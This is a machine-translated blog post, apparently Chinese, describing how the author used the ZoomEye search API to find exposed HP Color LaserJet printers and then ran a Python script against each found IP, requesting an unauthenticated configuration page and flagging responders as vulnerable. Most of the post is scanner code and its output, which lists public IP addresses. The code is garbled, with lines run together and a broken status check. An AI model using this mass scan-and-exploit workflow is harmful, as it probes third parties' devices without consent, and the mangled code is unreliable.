Zoomeye+seebug Radar Artillery dual engine power

Zoomeye Presumably everyone is familiar with, unfamiliar words. Satan is always familiar. If you're not familiar with it, Google is always familiar to you. Otherwise you should not have read this article. 233333, a joke. But then again, as I say, you probably know what's going on with Zoomeye. If you do not know, please Baidu a bit. I wait for you to come back ~

What are you going to do today, with all that crap? The show starts below.

A very confidential task, and then wrote an SDK for the Zoomeye API. Just then wrote a plugin in Seebug. is to detect an IoT device vulnerability. Then find the plug-in detection site time puzzled. I can't find it anyway.

So you're not saying that Zoomeye is so bad?

That's right!!!

That's it. I use the SDK I wrote to work with the Open API. Then:

#!/usr/bin/env python#-*-coding:utf-8-*-import sysimport requestsimport zoomeye.zoomeye as Zoomeyetest = Zoomeye.zoomeye () Username = ' Your [email protected] ' Password = ' Your zoomeye account password ' token = test.login (username , password)

So I've logged in to Zoomeye. What the? You said you didn't believe me?

#!/usr/bin/env python#-*-coding:utf-8-*-import sysimport requestsimport zoomeye.zoomeye as Zoomeyetest = Zoomeye.zoomeye () Username = ' Your [email protected] ' Password = ' Your zoomeye account password ' token = test.login (username , password) result = Test.search (' web ', query= ' HP Color LaserJet ', page=1,facets= ' app,os ') print result

Tell me, what do you see?

is not an instant feel oneself Meng Meng da ~

Then I wrote a script like this.

#!/usr/bin/env python#-*-coding:utf-8-*-import sysimport requestsimport Zoomeye.zoomeye as Zoomeyetest = Zoomeye.zoomeye () Username = ' Your [email protected] ' password = ' your Zoomeye accoun T password ' token = test.login (username, password) result = Test.search (' web ', query= ' HP Color LaserJet ', page=1,facets= ' App,os ') target = []for i in result:for x in i[' matches ']: print x[' IP '] target.append (x[' IP '][0]) for IP In target:try:payload = '/hp/device/internalpages/index?id=configurationpage ' url = ' http//' + IP + PA Yload res_exp = requests.get (URL) print ' [-]checking url%s '% url if Res_exp.status_code = = ' Homedevicename ' in Res_exp.content and ' Homedeviceip ' in Res_exp.content:print ' [+]%s is vul '% url El If Res_exp.status_code! = 200:print ' [+]%s is static '% URL Else:pass except Exception, E:pass 

And then the result is this:

[-]checking URL http://192.185.150.112/hp/device/internalpages/index?id=configurationpage[-]checking URL/http// 140.118.123.43/hp/device/internalpages/index?id=configurationpage[+]http://140.118.123.43/hp/device/ Internalpages/index?id=configurationpage is static[-]checking URL http://31.160.189.69/hp/device/InternalPages/ Index?id=configurationpage[+]http://31.160.189.69/hp/device/internalpages/index?id=configurationpage is static[- ]checking URL http://129.89.57.148/hp/device/internalpages/index?id=configurationpage[+]http://129.89.57.148/hp/ Device/internalpages/index?id=configurationpage is static[-]checking URL http://170.210.3.40/hp/device/ Internalpages/index?id=configurationpage[+]http://170.210.3.40/hp/device/internalpages/index?id= Configurationpage is static[-]checking URL http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://74.208.41.246/hp/device/internalpages/index?id=configurationpage is static[-]checking URL/http/ 140.112.57.144/hp/device/internalPages/index?id=configurationpage[+]http://140.112.57.144/hp/device/internalpages/index?id=configurationpage is Static[-]checking URL http://67.63.41.136/hp/device/internalpages/index?id=configurationpage[+]http:// 67.63.41.136/hp/device/internalpages/index?id=configurationpage is static

No eggs, ~_~.

Change page continue: Modify the page parameter.

Because of an account level issue.  There is a restrictive strategy here. When modified to 2, the result

{u ' url ': U ' https://www.zoomeye.org/api/doc#limitations ', u ' message ': U ' account is suspend, excceeding the 30% of total ( 7.5) ', U ' error ': U ' suspended '}

Then try the Web version. Through unremitting efforts.

Eventually

 is Vul

The plugin was submitted at seebug.

Zoomeye+seebug Radar Artillery dual engine power